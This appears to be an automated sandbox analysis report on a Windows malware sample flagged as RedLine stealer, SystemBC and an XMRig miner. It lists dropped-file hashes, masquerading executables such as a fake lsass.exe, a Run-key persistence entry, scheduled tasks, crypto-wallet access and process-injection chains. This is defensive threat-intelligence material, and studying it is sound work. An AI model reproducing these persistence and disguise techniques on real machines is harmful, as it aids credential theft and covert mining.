SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

memory/1964-104-0x0000000002600000-0x0000000002680000-memory.dmp

memory/1964-103-0x0000000002600000-0x0000000002680000-memory.dmp

memory/1964-105-0x0000000002600000-0x0000000002680000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/1964-112-0x0000000002600000-0x0000000002680000-memory.dmp

memory/1896-113-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1704-118-0x00000000001A0000-0x00000000005C0000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1364-122-0x000000013F600000-0x000000013FFCA000-memory.dmp

memory/1704-123-0x00000000001A0000-0x00000000005C0000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

memory/1704-132-0x00000000032E0000-0x0000000003320000-memory.dmp

memory/1960-133-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/1960-134-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/1960-135-0x000000000266B000-0x00000000026A2000-memory.dmp

memory/1896-136-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1704-137-0x00000000001A0000-0x00000000005C0000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1316-138-0x000000013FF30000-0x00000001408FA000-memory.dmp

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1704-147-0x00000000001A0000-0x00000000005C0000-memory.dmp

memory/1704-148-0x0000000006560000-0x0000000006980000-memory.dmp

memory/804-149-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/1704-150-0x00000000001A0000-0x00000000005C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2AAA.tmp.bat

MD5 d395d9d8ae883934bfeba74ff95953de
SHA1 d1cf03d8a0adf0384e4139d459c1f06a9a34df64
SHA256 ebb5d0ca4ed8c83da96b776ee45b9027d7648ed5b5a49dde3a35ba87e779a86c
SHA512 9774d53108ccec1f7c993fc536b5394b7a16c49bbd224a9ed3eba2f804a8871188dccf64d50e060e468cbbbbf3da9179cd14459bb390e022268fa2384b2e55d4

memory/804-160-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/804-159-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/1704-158-0x00000000001A0000-0x00000000005C0000-memory.dmp

memory/804-161-0x0000000005F70000-0x0000000005FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2AAA.tmp.bat

MD5 d395d9d8ae883934bfeba74ff95953de
SHA1 d1cf03d8a0adf0384e4139d459c1f06a9a34df64
SHA256 ebb5d0ca4ed8c83da96b776ee45b9027d7648ed5b5a49dde3a35ba87e779a86c
SHA512 9774d53108ccec1f7c993fc536b5394b7a16c49bbd224a9ed3eba2f804a8871188dccf64d50e060e468cbbbbf3da9179cd14459bb390e022268fa2384b2e55d4

memory/804-167-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/804-171-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/804-173-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/804-174-0x0000000005F70000-0x0000000005FB0000-memory.dmp

memory/804-179-0x0000000000FD0000-0x00000000013F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/316-185-0x00000000001B0000-0x00000000001D0000-memory.dmp

memory/1316-184-0x000000013FF30000-0x00000001408FA000-memory.dmp

memory/804-187-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/992-188-0x0000000140000000-0x0000000140029000-memory.dmp

memory/316-189-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/804-191-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/992-192-0x0000000140000000-0x0000000140029000-memory.dmp

memory/804-195-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/316-197-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/804-199-0x0000000000FD0000-0x00000000013F0000-memory.dmp

memory/316-200-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

memory/316-202-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 21:28

Reported

2023-05-06 22:47

Platform

win10v2004-20230220-en

Max time kernel

182s

Max time network

198s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2088 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1116 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1116 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4880 wrote to memory of 3392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 3392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 1284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 1284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 3476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 3476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 3892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1116 wrote to memory of 3892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1116 wrote to memory of 3892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1116 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1116 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1116 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1252 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 2644 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 2224 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 2224 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1252 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1252 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1252 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1252 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
